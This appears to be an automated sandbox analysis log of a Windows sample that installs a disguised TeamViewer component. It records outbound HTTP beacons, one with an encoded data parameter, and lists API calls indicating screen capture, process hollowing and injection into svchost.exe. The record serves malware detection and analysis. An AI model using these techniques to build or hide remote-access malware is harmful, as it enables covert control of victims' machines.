Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: unknownHTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3366E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33A130 CharLowerA,CreateEventA,GetLastError,CloseHandle,GetCurrentThreadId,GetThreadDesktop,CloseHandle,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,CloseHandle,
Source: 77Etc0bR2v.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00404853
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00406131
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004A13AA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053E430
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004C97CD
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00534810
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_005438ED
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00544B6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00546FFB
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02723161
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272283C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02722424
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02722004
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272460B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02723161
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272283C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02722424
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02722004
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272460B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_026F6828
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_026F7104
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_026F6000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053BCE8 appears 68 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F333610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B1F0 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33ADE0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33AFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B270 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33AD39 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33A500 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33AE20 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3318D0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33ADE0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B270 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B1F0 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AE20 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AD39 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3318D0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33A500 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AD39 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33A500 NtQueryVirtualMemory,
